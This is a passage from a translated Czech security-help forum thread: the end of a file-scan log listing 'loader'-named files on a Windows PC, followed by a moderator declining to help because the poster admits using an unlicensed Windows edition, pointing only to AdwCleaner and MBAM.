[2010.01.26 22:16:30 | 000,010,882 | ---- | M] () -- \Program Files\MATLAB\R2011b\sys\perl\win32\lib\XSLoader.pm
[2010.01.26 22:18:04 | 000,032,875 | ---- | M] () -- \Program Files\MATLAB\R2011b\sys\perl\win32\lib\auto\ByteLoader\ByteLoader.dll
[2008.06.07 07:04:56 | 000,001,378 | ---- | M] () -- \Program Files\MATLAB\R2011b\sys\perl\win32\lib\Locale\Maketext\GutsLoader.pm
[2011.02.27 20:20:44 | 000,008,863 | ---- | M] () -- \Program Files\MATLAB\R2011b\toolbox\datafeed\datafeed\rdthloader.m
[2011.05.06 15:32:02 | 000,009,209 | ---- | M] () -- \Program Files\MATLAB\R2011b\toolbox\datafeed\datafeed\rnseloader.m
[2009.01.23 16:29:42 | 000,000,386 | ---- | M] () -- \Program Files\MATLAB\R2011b\toolbox\idelink\foundation\lfsocket\lfsocket\lfsocket_loaderrortable.m
[2010.01.31 22:11:52 | 000,011,380 | ---- | M] () -- \Program Files\MATLAB\R2011b\toolbox\instrument\instrument\private\privateIviComLoader.m
[2008.10.08 12:14:06 | 000,000,257 | ---- | M] () -- \Program Files\MATLAB\R2011b\toolbox\local\classloader.txt
[2008.03.13 13:38:08 | 000,609,990 | ---- | M] () -- \Program Files\MATLAB\R2011b\toolbox\physmod\sh\shdemos\front_loader.bmp
[2011.06.02 17:25:12 | 000,182,295 | ---- | M] () -- \Program Files\MATLAB\R2011b\toolbox\physmod\sh\shdemos\sh_front_loader_actuation_system.mdl
[2011.07.09 07:22:14 | 000,004,360 | ---- | M] () -- \Program Files\MATLAB\R2011b\toolbox\physmod\sh\shdemos\html\sh_front_loader_actuation_system.html
[2011.07.09 07:22:14 | 000,006,098 | ---- | M] () -- \Program Files\MATLAB\R2011b\toolbox\physmod\sh\shdemos\html\sh_front_loader_actuation_system.png
[2011.07.09 07:21:52 | 000,192,771 | ---- | M] () -- \Program Files\MATLAB\R2011b\toolbox\physmod\sh\shdemos\html\sh_front_loader_actuation_system_01.png
[2008.05.01 15:23:40 | 000,003,887 | ---- | M] () -- \Program Files\MATLAB\R2011b\toolbox\rtw\targets\mpc555dk\mpc555dk\mpc555_launch_downloader.m
[2011.07.08 18:23:18 | 000,000,935 | ---- | M] () -- \Program Files\MATLAB\R2011b\toolbox\rtw\targets\mpc555dk\mpc555dk\mpc555_launch_downloader.p
[2010.11.17 07:18:32 | 000,002,759 | ---- | M] () -- \Program Files\MATLAB\R2011b\toolbox\rtw\targets\xpc\xpc\bin\bootloader.bin
[2011.07.08 17:14:48 | 000,000,578 | ---- | M] () -- \Program Files\MATLAB\R2011b\toolbox\stm\stm\+stm\SimulinkModelLoader.p
[2011.08.06 05:32:46 | 000,032,256 | ---- | M] () -- \Program Files\MATLAB\R2011b\toolbox\symbolic\symbolic\mupadmexunloader.mexw64
[2010.10.25 13:41:30 | 000,004,375 | ---- | M] () -- \Program Files\MATLAB\R2011b\toolbox\systemtest\systemtest\+systest\+internal\+loading\@TestLoader\TestLoader.m
[2010.05.13 12:45:36 | 000,000,815 | ---- | M] () -- \Program Files\MATLAB\R2011b\toolbox\target\extensions\processor\tic2000\+tic2000\+targetprefext\@Peripheral\Flash_loaderAPIBrowse_UICallback.m
[2009.04.27 14:58:00 | 000,000,560 | ---- | M] () -- \Program Files\MATLAB\R2011b\toolbox\target\extensions\processor\tic2000\+tic2000\+targetprefext\@Peripheral\Flash_loaderAutomatic_UICallback.m
[2009.04.27 14:58:02 | 000,000,541 | ---- | M] () -- \Program Files\MATLAB\R2011b\toolbox\target\extensions\processor\tic2000\+tic2000\+targetprefext\@Peripheral\Flash_loaderEnable_Flash_UICallback.m
[2010.01.31 22:32:48 | 000,001,997 | ---- | M] () -- \Program Files\MATLAB\R2011b\toolbox\target\extensions\processor\tic2000\+tic2000\+targetprefext\@Peripheral\Flash_loaderExecute_UICallback.m
[2009.10.24 14:44:30 | 000,007,131 | ---- | M] () -- \Program Files\MATLAB\R2011b\toolbox\target\extensions\processor\tic2000\+tic2000\+targetprefext\@Peripheral\PeriphInitFlash_loader.m
[2007.09.27 14:17:42 | 000,085,352 | ---- | M] () -- \Program Files\Microsoft SDKs\Windows\v6.0A\Bin\IALoader.dll
[2012.06.09 18:19:37 | 000,055,296 | ---- | M] () -- \Program Files\WinRAR\Formats\ace32loader.exe
[2014.06.20 09:41:04 | 000,019,765 | ---- | M] () -- \Users\Lobo\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\cmaiofennmphjldldcpphcechfnnohja\2.1.0.23_0\js\configLoader.js
[2014.06.20 09:41:04 | 000,002,597 | ---- | M] () -- \Users\Lobo\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\cmaiofennmphjldldcpphcechfnnohja\2.1.0.23_0\js\scriptLoader.js
[2014.09.22 17:11:57 | 000,001,980 | ---- | M] () -- \Users\Lobo\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\2KK1GQSS\AdLoader[1].htm
[2014.07.22 10:51:47 | 000,220,068 | ---- | M] () -- \Users\Lobo\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\2KK1GQSS\loader.en_US[1].js
[2014.11.11 14:04:41 | 000,031,353 | ---- | M] () -- \Users\Lobo\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\PXZ2RVZM\Loader[1].js
[2014.07.24 13:53:16 | 000,072,638 | ---- | M] () -- \Users\Lobo\AppData\Local\Skype\Apps\login\images\loader.gif
[2014.07.24 13:53:16 | 000,003,032 | ---- | M] () -- \Users\Lobo\AppData\Local\Skype\Apps\login\images\loader.png
[2014.07.24 13:53:16 | 000,006,012 | ---- | M] () -- \Users\Lobo\AppData\Local\Skype\Apps\login\images\normal\loader_15fps.gif
[2014.07.24 13:53:16 | 000,021,956 | ---- | M] () -- \Users\Lobo\AppData\Local\Skype\Apps\login\images\normal\loader_30fps.gif
[2014.07.24 13:53:16 | 000,009,772 | ---- | M] () -- \Users\Lobo\AppData\Local\Skype\Apps\login\images\retina\loader@2x.png
[2014.10.14 08:21:18 | 000,008,192 | ---- | M] () -- \Users\Lobo\AppData\Local\Temp\_MEI32082\_win32sysloader.pyd
[2014.11.13 10:32:45 | 000,008,192 | ---- | M] () -- \Users\Lobo\AppData\Local\Temp\_MEI32482\_win32sysloader.pyd
[2014.10.15 13:17:44 | 000,008,192 | ---- | M] () -- \Users\Lobo\AppData\Local\Temp\_MEI32522\_win32sysloader.pyd
[2014.11.28 09:34:15 | 000,008,192 | ---- | M] () -- \Users\Lobo\AppData\Local\Temp\_MEI32802\_win32sysloader.pyd
[2014.12.09 13:42:00 | 000,008,192 | ---- | M] () -- \Users\Lobo\AppData\Local\Temp\_MEI32842\_win32sysloader.pyd
[2014.11.13 00:01:00 | 000,008,192 | ---- | M] () -- \Users\Lobo\AppData\Local\Temp\_MEI32922\_win32sysloader.pyd
[2014.11.06 11:03:18 | 000,008,192 | ---- | M] () -- \Users\Lobo\AppData\Local\Temp\_MEI33162\_win32sysloader.pyd
[2014.12.01 09:22:19 | 000,008,192 | ---- | M] () -- \Users\Lobo\AppData\Local\Temp\_MEI33442\_win32sysloader.pyd
[2014.12.09 08:11:33 | 000,008,192 | ---- | M] () -- \Users\Lobo\AppData\Local\Temp\_MEI33443\_win32sysloader.pyd
[2014.12.05 16:45:54 | 000,008,192 | ---- | M] () -- \Users\Lobo\AppData\Local\Temp\_MEI33802\_win32sysloader.pyd
[2014.11.20 20:10:01 | 000,008,192 | ---- | M] () -- \Users\Lobo\AppData\Local\Temp\_MEI33882\_win32sysloader.pyd
[2014.05.19 19:02:16 | 000,006,494 | ---- | M] () -- \Users\Lobo\AppData\Local\Temp\avg_a02732\ProgData\AVG SafeGuard toolbar\FireFoxExt\15.3.0.10\modules\skin\ajax-loader.gif
[2014.05.19 19:02:16 | 000,000,729 | ---- | M] () -- \Users\Lobo\AppData\Local\Temp\avg_a02732\ProgData\AVG SafeGuard toolbar\FireFoxExt\15.3.0.10\modules\skin\loader.gif
[2014.05.19 19:02:16 | 000,019,497 | ---- | M] () -- \Users\Lobo\AppData\Local\Temp\avg_a02732\ProgFiles\AVG SafeGuard toolbar\UninstallRes\ClientPackage\Images\uninstall\loader.gif
[2014.05.19 19:02:26 | 000,006,494 | ---- | M] () -- \Users\Lobo\AppData\Local\Temp\avg_a06880\ProgData\AVG SafeGuard toolbar\FireFoxExt\18.1.0.443\modules\skin\ajax-loader.gif
[2014.05.19 19:02:26 | 000,000,729 | ---- | M] () -- \Users\Lobo\AppData\Local\Temp\avg_a06880\ProgData\AVG SafeGuard toolbar\FireFoxExt\18.1.0.443\modules\skin\loader.gif
[2014.05.19 19:02:26 | 000,004,178 | ---- | M] () -- \Users\Lobo\AppData\Local\Temp\avg_a06880\ProgFiles\AVG SafeGuard toolbar\Chrome\content\icons\loader.gif
[2014.05.19 19:02:26 | 000,019,497 | ---- | M] () -- \Users\Lobo\AppData\Local\Temp\avg_a06880\ProgFiles\AVG SafeGuard toolbar\UninstallRes\ClientPackage\Images\uninstall\loader.gif
[2014.09.02 11:02:30 | 000,002,193 | ---- | M] () -- \Users\Lobo\AppData\Local\Temp\s110\images\loader.gif
[2014.05.19 19:02:26 | 000,019,497 | ---- | M] () -- \Users\Lobo\AppData\Local\Temp\UninstallRes\ClientPackage\Images\uninstall\loader.gif
[2014.10.16 09:31:18 | 000,001,408 | ---- | M] () -- \Users\Lobo\AppData\Roaming\Microsoft\Windows\SendTo\AVS Mobile Uploader.lnk
[2014.10.16 09:31:20 | 000,001,396 | ---- | M] () -- \Users\Lobo\AppData\Roaming\Microsoft\Windows\SendTo\AVS Video Uploader.lnk
[2014.11.27 08:30:13 | 000,024,760 | ---- | M] () -- \Windows\assembly\GAC_32\Microsoft.TeamFoundation.WorkItemTracking.Client.DataStoreLoader\11.0.0.0__b03f5f7f11d50a3a\Microsoft.TeamFoundation.WorkItemTracking.Client.DataStoreLoader.dll
[2014.11.27 08:30:13 | 000,023,224 | ---- | M] () -- \Windows\assembly\GAC_64\Microsoft.TeamFoundation.WorkItemTracking.Client.DataStoreLoader\11.0.0.0__b03f5f7f11d50a3a\Microsoft.TeamFoundation.WorkItemTracking.Client.DataStoreLoader.dll
[2014.11.27 09:08:49 | 000,020,480 | ---- | M] () -- \Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Tde5bef3b#\4a088e8987f29c42bc0a97aeae2ac534\Microsoft.TeamFoundation.WorkItemTracking.Client.DataStoreLoader.ni.dll
[2014.11.27 09:08:49 | 000,000,376 | ---- | M] () -- \Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Tde5bef3b#\4a088e8987f29c42bc0a97aeae2ac534\Microsoft.TeamFoundation.WorkItemTracking.Client.DataStoreLoader.ni.dll.aux
[2014.11.27 09:06:10 | 000,027,136 | ---- | M] () -- \Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Tde5bef3b#\a48181287797e486eef52377c6d92965\Microsoft.TeamFoundation.WorkItemTracking.Client.DataStoreLoader.ni.dll
[2014.11.27 09:06:10 | 000,000,376 | ---- | M] () -- \Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Tde5bef3b#\a48181287797e486eef52377c6d92965\Microsoft.TeamFoundation.WorkItemTracking.Client.DataStoreLoader.ni.dll.aux
[2007.11.07 10:21:26 | 000,072,192 | R--- | M] () -- \Windows\Installer\$PatchCache$\Managed\4E1DAD7D4F54B2B398A9AE271876CEF4\9.0.21022\FL_coloader80_dll_128691_128691_x86_ln.3643236F_FC70_11D3_A536_0090278A1BB8
[2007.11.06 20:10:00 | 000,004,096 | R--- | M] () -- \Windows\Installer\$PatchCache$\Managed\4E1DAD7D4F54B2B398A9AE271876CEF4\9.0.21022\FL_coloader80_tlb_128927_128927_x86_ln.3643236F_FC70_11D3_A536_0090278A1BB8
[2007.11.07 09:21:26 | 000,072,192 | R--- | M] () -- \Windows\Installer\$PatchCache$\Managed\C04B3576DBF0DEB3A8D9A0AC2CCD8DD5\9.0.21022\FL_coloader80_dll_128691_128691_x86_ln.3643236F_FC70_11D3_A536_0090278A1BB8
[2007.11.06 19:10:00 | 000,004,096 | R--- | M] () -- \Windows\Installer\$PatchCache$\Managed\C04B3576DBF0DEB3A8D9A0AC2CCD8DD5\9.0.21022\FL_coloader80_tlb_128927_128927_x86_ln.3643236F_FC70_11D3_A536_0090278A1BB8
[2009.07.14 02:03:49 | 000,003,584 | -H-- | M] () -- \Windows\System32\api-ms-win-core-libraryloader-l1-1-0.dll
[2009.07.14 02:15:12 | 000,038,400 | ---- | M] () -- \Windows\System32\dmloader.dll
[2014.01.29 03:11:28 | 000,012,532 | ---- | M] () -- \Windows\System32\Adobe\Shockwave 12\shockwave_Projector_Loader.dcr
[2014.01.29 05:39:46 | 000,009,622 | ---- | M] () -- \Windows\System32\Macromed\Shockwave 10\shockwave_Projector_Loader.dcr
[2009.07.14 02:03:49 | 000,003,584 | -H-- | M] () -- \Windows\SysWOW64\api-ms-win-core-libraryloader-l1-1-0.dll
[2009.07.14 02:15:12 | 000,038,400 | ---- | M] () -- \Windows\SysWOW64\dmloader.dll
[2014.01.29 03:11:28 | 000,012,532 | ---- | M] () -- \Windows\SysWOW64\Adobe\Shockwave 12\shockwave_Projector_Loader.dcr
[2014.01.29 05:39:46 | 000,009,622 | ---- | M] () -- \Windows\SysWOW64\Macromed\Shockwave 10\shockwave_Projector_Loader.dcr
[2009.07.14 02:40:31 | 000,047,616 | ---- | M] () -- \Windows\winsxs\amd64_microsoft-windows-audio-dmusic_31bf3856ad364e35_6.1.7600.16385_none_a1e90d98a953d601\dmloader.dll
[2009.07.14 02:24:53 | 000,003,584 | -H-- | M] () -- \Windows\winsxs\amd64_microsoft-windows-minkernelapinamespace_31bf3856ad364e35_6.1.7600.16385_none_66a6e19d9580f9e3\api-ms-win-core-libraryloader-l1-1-0.dll
[2009.07.14 16:17:49 | 000,004,431 | ---- | M] () -- \Windows\winsxs\Backup\amd64_microsoft-windows-b..os-loader.resources_31bf3856ad364e35_6.1.7600.16385_cs-cz_8f37605116ba80bc.manifest
[2009.07.14 16:17:49 | 000,033,360 | ---- | M] () -- \Windows\winsxs\Backup\amd64_microsoft-windows-b..os-loader.resources_31bf3856ad364e35_6.1.7600.16385_cs-cz_8f37605116ba80bc_winload.efi.mui_35ee487d
[2009.07.14 16:17:49 | 000,034,896 | ---- | M] () -- \Windows\winsxs\Backup\amd64_microsoft-windows-b..os-loader.resources_31bf3856ad364e35_6.1.7600.16385_cs-cz_8f37605116ba80bc_winload.exe.mui_3bc5b827
[2009.07.14 16:17:49 | 000,029,776 | ---- | M] () -- \Windows\winsxs\Backup\amd64_microsoft-windows-b..os-loader.resources_31bf3856ad364e35_6.1.7600.16385_cs-cz_8f37605116ba80bc_winresume.efi.mui_f412814e
[2009.07.14 16:17:49 | 000,030,288 | ---- | M] () -- \Windows\winsxs\Backup\amd64_microsoft-windows-b..os-loader.resources_31bf3856ad364e35_6.1.7600.16385_cs-cz_8f37605116ba80bc_winresume.exe.mui_ff8b5358
[2009.07.14 03:58:45 | 000,005,745 | ---- | M] () -- \Windows\winsxs\Backup\amd64_microsoft-windows-b..vironment-os-loader_31bf3856ad364e35_6.1.7600.16385_none_b71babd98657e6ef.manifest
[2009.07.14 03:58:45 | 000,641,088 | ---- | M] () -- \Windows\winsxs\Backup\amd64_microsoft-windows-b..vironment-os-loader_31bf3856ad364e35_6.1.7600.16385_none_b71babd98657e6ef_winload.efi_75834aa0
[2009.07.14 03:58:45 | 000,604,192 | ---- | M] () -- \Windows\winsxs\Backup\amd64_microsoft-windows-b..vironment-os-loader_31bf3856ad364e35_6.1.7600.16385_none_b71babd98657e6ef_winload.exe_75835076
[2009.07.14 03:58:45 | 000,557,136 | ---- | M] () -- \Windows\winsxs\Backup\amd64_microsoft-windows-b..vironment-os-loader_31bf3856ad364e35_6.1.7600.16385_none_b71babd98657e6ef_winresume.efi_85cd069f
[2009.07.14 03:58:45 | 000,518,352 | ---- | M] () -- \Windows\winsxs\Backup\amd64_microsoft-windows-b..vironment-os-loader_31bf3856ad364e35_6.1.7600.16385_none_b71babd98657e6ef_winresume.exe_85cd1215
[2009.07.14 03:57:50 | 000,002,896 | ---- | M] () -- \Windows\winsxs\Backup\amd64_microsoft-windows-s..ive-blackbox-loader_31bf3856ad364e35_6.1.7600.16385_none_c72819e06acceb59.manifest
[2009.07.14 03:57:50 | 000,019,008 | ---- | M] () -- \Windows\winsxs\Backup\amd64_microsoft-windows-s..ive-blackbox-loader_31bf3856ad364e35_6.1.7600.16385_none_c72819e06acceb59_spldr.sys_98bd87a0
[2009.07.14 16:15:51 | 000,004,431 | ---- | M] () -- \Windows\winsxs\Manifests\amd64_microsoft-windows-b..os-loader.resources_31bf3856ad364e35_6.1.7600.16385_cs-cz_8f37605116ba80bc.manifest
[2009.07.14 03:13:42 | 000,005,745 | ---- | M] () -- \Windows\winsxs\Manifests\amd64_microsoft-windows-b..vironment-os-loader_31bf3856ad364e35_6.1.7600.16385_none_b71babd98657e6ef.manifest
[2011.02.05 14:09:31 | 000,005,745 | ---- | M] () -- \Windows\winsxs\Manifests\amd64_microsoft-windows-b..vironment-os-loader_31bf3856ad364e35_6.1.7600.16757_none_b73e23c9863dba66.manifest
[2011.02.05 14:04:44 | 000,005,745 | ---- | M] () -- \Windows\winsxs\Manifests\amd64_microsoft-windows-b..vironment-os-loader_31bf3856ad364e35_6.1.7600.20897_none_b79c80e49f7bc9f4.manifest
[2011.02.05 18:34:23 | 000,005,745 | ---- | M] () -- \Windows\winsxs\Manifests\amd64_microsoft-windows-b..vironment-os-loader_31bf3856ad364e35_6.1.7601.17556_none_b923808583650cfb.manifest
[2011.02.05 14:09:57 | 000,005,745 | ---- | M] () -- \Windows\winsxs\Manifests\amd64_microsoft-windows-b..vironment-os-loader_31bf3856ad364e35_6.1.7601.21655_none_b9ac1d069c83936e.manifest
[2009.07.14 03:18:27 | 000,002,896 | ---- | M] () -- \Windows\winsxs\Manifests\amd64_microsoft-windows-s..ive-blackbox-loader_31bf3856ad364e35_6.1.7600.16385_none_c72819e06acceb59.manifest
[2009.07.14 02:15:12 | 000,038,400 | ---- | M] () -- \Windows\winsxs\x86_microsoft-windows-audio-dmusic_31bf3856ad364e35_6.1.7600.16385_none_45ca7214f0f664cb\dmloader.dll
[2009.07.14 02:03:49 | 000,003,584 | -H-- | M] () -- \Windows\winsxs\x86_microsoft-windows-minkernelapinamespace_31bf3856ad364e35_6.1.7600.16385_none_0a884619dd2388ad\api-ms-win-core-libraryloader-l1-1-0.dll

< End of report >

vyosek
VIP
Posts: 56373
Registered: 07 Nov 2006 15:24
Location: Šalingrad - Brno

Re: Malware - please check my log

#6 Post by vyosek »

Just to ask: are you using a legal operating system? The highest licence (worth a thousand or so), Ultimate, is not exactly a common home edition.
"Who has wine and does not drink, who has grapes and does not eat them, who has a wife and does not kiss her, who shuns merriment, take a whip and a stick to him; that is not a man, that is an ox."
Member [image] since 1 February 2011.

chvostik
Visitor
Posts: 31
Registered: 04 Apr 2008 17:37

Re: Malware - please check my log

#7 Post by chvostik »

I think you can tell from the log that it isn't. Is that a problem?

vyosek
VIP
Posts: 56373
Registered: 07 Nov 2006 15:24
Location: Šalingrad - Brno

Re: Malware - please check my log

#8 Post by vyosek »

Yes, it is a problem. Our forum does not deal with illegal systems; this is stated quite clearly in the forum rules and in the charter of the international alliance ASAP, of which we are members...

I'm sorry...

chvostik
Visitor
Posts: 31
Registered: 04 Apr 2008 17:37

Re: Malware - please check my log

#9 Post by chvostik »

Then I can only hope that ESET didn't let it through to me (it has never let me down so far)... thanks for your time anyway.

vyosek
VIP
Posts: 56373
Registered: 07 Nov 2006 15:24
Location: Šalingrad - Brno

Re: Malware - please check my log

#10 Post by vyosek »

Unfortunately let through

Look into AdwCleaner and MBAM; I cannot advise further.

A pleasant evening to you too, and thank you for your understanding.

Locked